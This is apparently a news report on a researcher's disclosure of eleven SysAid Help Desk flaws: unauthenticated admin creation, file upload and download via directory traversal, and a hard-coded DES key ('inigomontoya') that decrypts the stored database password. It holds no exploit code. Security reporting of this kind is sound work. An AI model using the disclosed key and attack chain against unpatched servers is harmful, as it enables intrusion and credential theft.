14 DAY TRIAL // A slew of security flaws discovered in SysAid Help Desk software solution used by organizations in over 140 countries could be used by an attacker to download and upload files and to execute arbitrary code without authentication.
SysAid is an ITSM (IT service management) product designed to improve a company’s help desk performance via an intuitive platform that allows assigning incident tickets based on their importance and the department responsible for solving them.
IT administrators can also use the platform to manage software and hardware assets in the company, create custom reports or pull analytics.
The company boasts a user base of more than 10,000 organizations, comprising big names like Coca Cola, Adobe, LG, Panasonic and IKEA.
Risk of remote code execution
Security researcher Pedro Ribeiro analyzed version 14.4 of the software and found a total of 11 security holes, ten of them affecting the Windows edition and one impacting the Linux release. Exploits for six of them are already present in the Metasploit module and can be used for penetration testing.
Among the most important of the flaws is the possibility to create an administrator account, without needing to authenticate or provide any information.
The glitch is tracked as CVE-2015-2993, and Ribeiro notes that the vulnerability can be exploited only once, even if the Apache Tomcat server is rebooted.
Another issue is uploading arbitrary files via directory traversal attacks (CVE-2015-2994, CVE-2015-2995). Exploiting one of them requires an administrator account, but taking advantage of the other can be done without any constraints, the researcher says, and in both cases remote code execution can be achieved.
Hard-coded sensitive data
In his assessment, Ribeiro discovered that SysAid was delivered with a hard-coded cryptographic key and encryption parameters. Used in conjunction with an arbitrary file download glitch (CVE-2015-2996) also affecting the software, an attacker can obtain the server configuration file and decrypt the database password.
In the security advisory published on Wednesday, the researcher says that the encryption algorithm used is DES with an MD5 hash and that the key he found was “inigomontoya.”
Also hard-coded is the administrator account password for the SQL Server Express database software, built into SysAid for Windows.
The developer says that the current update for SysAid 15.2 mitigates the issues. Ribeira did not run any tests on the new release and cannot confirm if all the vulnerabilities have been addressed.
